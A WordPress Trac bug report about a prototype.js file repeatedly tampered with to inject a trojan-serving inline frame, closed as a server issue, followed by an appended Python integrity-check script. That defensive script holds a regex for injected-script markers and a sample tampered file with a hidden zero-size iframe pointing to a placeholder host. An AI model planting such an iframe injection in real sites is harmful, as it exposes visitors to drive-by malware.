WordPress.org

Make WordPress Core

Opened 7 years ago

Closed 7 years ago

#7955 closed defect (bug) (invalid)

Prototype.js needs an update.

Reported by: SupersonicSquirrel
Owned by:
Milestone:
Priority: high
Severity: major
Version: 2.6.1
Component: Administration
Keywords: prototype.js javascript
Focuses:
Cc:

Description

(I hope I'm doing this right, as it's clearly not a forum topic, but a serious issue.)

I have experienced hacking of my prototype.js file on a high-traffic website a couple of times within the recent week and each time malicious code would be added to it in order to open an inline frame leading to a website that was automatically downloading Trojans to a visitor's computer.

Of course, I always update my installation of WordPress within 1-2 hours from when an update is available (and I obviously use 2.6.3 and not 2.6.1...), the only writeable files on my server are the sitemaps; I know how to protect my files and folders; so I assume this is an issue that could repeat on someone else's website as well.

From what I can see, the file on http://www.prototypejs.org/download is different from the file included with WordPress. I wonder if updating the file included in wp-includes/js/ would change anything.

I'm sorry if I wasted anyone's time here. When I report a vulnerability at the forum, I get responses from newbies telling me stupid things.

Change History (2)

comment:1 @Viper007Bond 7 years ago

If your actual prototype.js file is being modified, then you have a server security issue.

comment:2 @ryan 7 years ago

  • Milestone 2.7 deleted
  • Resolution set to invalid
  • Status changed from new to closed

We're not on the latest version of prototype, but the latest doesn't address security issues. Prototype is not the problem. We plan to update prototype for WP 2.8.
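Added example, not part of the ticket and not WordPress code: a check that compares a deployed prototype.js against the copy from the release package of the installed WordPress version (rather than the upstream Prototype download, which comment:2 notes is a different version) and lists added lines that look like an injected inline frame. The `audit` function, the pattern list and the sample file contents are assumptions constructed for illustration.

```python
import difflib
import hashlib
import re

# Heuristic markers for the kind of injection described in the ticket.
# Any difference from the pristine copy is already a finding; these only help triage.
SUSPICIOUS = re.compile(r"<\s*iframe|document\.write\s*\(|unescape\s*\(|eval\s*\(", re.I)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def audit(deployed: bytes, pristine: bytes) -> dict:
    """Compare the deployed file with a known-good copy of the same release."""
    if sha256(deployed) == sha256(pristine):
        return {"modified": False, "added": [], "suspicious": []}
    a = pristine.decode("utf-8", "replace").splitlines()
    b = deployed.decode("utf-8", "replace").splitlines()
    added = []
    matcher = difflib.SequenceMatcher(None, a, b, autojunk=False)
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            # Record (line number in deployed file, line text) for every new line.
            added.extend((n + 1, b[n]) for n in range(j1, j2))
    suspicious = [(n, line) for n, line in added if SUSPICIOUS.search(line)]
    return {"modified": True, "added": added, "suspicious": suspicious}


# Constructed sample data (placeholders, not real file contents).
PRISTINE = b"var Prototype = {\n  Version: 'x.y.z'\n};\n"
TAMPERED = PRISTINE + (
    b"document.write('<iframe src=\"http://injected.example/\" "
    b"width=0 height=0></iframe>');\n"
)
OTHER_VERSION = b"var Prototype = {\n  Version: 'a.b.c'\n};\n"

if __name__ == "__main__":
    for name, data in [("pristine", PRISTINE), ("tampered", TAMPERED),
                       ("other version", OTHER_VERSION)]:
        result = audit(data, PRISTINE)
        print(name, "modified:", result["modified"],
              "suspicious lines:", [n for n, _ in result["suspicious"]])
```

A file that differs only because it is another Prototype version shows as modified with no suspicious lines, which is why the baseline has to be the copy shipped with the installed WordPress release.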
